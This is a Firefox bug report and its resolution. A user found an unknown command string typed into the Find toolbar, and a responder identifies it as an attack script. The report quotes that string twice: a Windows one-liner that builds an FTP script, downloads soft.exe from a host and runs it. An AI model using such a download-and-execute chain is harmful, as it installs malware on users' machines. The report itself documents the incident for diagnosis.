Closed Bug 538046 Opened 16 years ago Closed 16 years ago

Someone was typing commands in the Find toolbar

Categories

(Firefox :: General, defect)

Product:
Firefox
Component:
General
Platform:
x86
macOS
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: paul.sheldrake, Unassigned)

References

(
URL
)

Details

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 I was logged in to Flickr when the page started jumping around. I noticed that the Find toolbar (ctrl+F) was open and text was been typed in to it which I was not typing. This is a copy of what was typed in the toolbar: c echo open IP 21 >> ik &echo user dsluser telnet >> ik &echo binary >> ik &echo get soft.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &soft.exe &exit Reproducible: Couldn't Reproduce Steps to Reproduce: Sorry, i was just on the photo sets page in flickr.
First, you have a very old and insecure version of firefox, please update to 3.5.6 or later.
Component: Security → General
QA Contact: firefox → general
(In reply to comment #0) > User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; > rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 > Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; > rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 > > I was logged in to Flickr when the page started jumping around. I noticed that > the Find toolbar (ctrl+F) was open and text was been typed in to it which I was > not typing. > > This is a copy of what was typed in the toolbar: > > c echo open IP 21 >> ik &echo user dsluser telnet >> ik &echo binary >> ik > &echo get soft.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &soft.exe > &exit If someone was actually typing on your computer when you weren't around, and you don't have some kind of remote-access application set up, then it's likely your computer has been victimized somehow. It's unlikely that Firefox was the vector there, but it's hard to be sure. The quoted text appears to be an attempt to log in to an ftp host, download an executable (soft.exe) and run it. Most likely, this was the result of an attack script trying to download more tools with which to harm your computer. I can't offer you much advice, I'm sorry to say, beyond backing up the data that's important to you, and then either investigating some kind of malware-removal software, or reinstalling your machine. I'm resolving this bug INVALID, not because I'm not sensitive to your plight, but because there's nothing Firefox can do, here. The fact that it opened your Find bar is accidental - the attack script was likely attempting to type this text into a terminal window, but because you were using the computer at the time and Firefox had control of the keyboard, the attack was misdirected into your find bar instead. Given that you seem to be on a mac, downloading soft.exe and attempting to run it would not have worked anyhow - so it may be that your machine is not at further risk, but I'm not really equipped to make that assessment.
Status: UNCONFIRMED → RESOLVED
Closed: 16 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.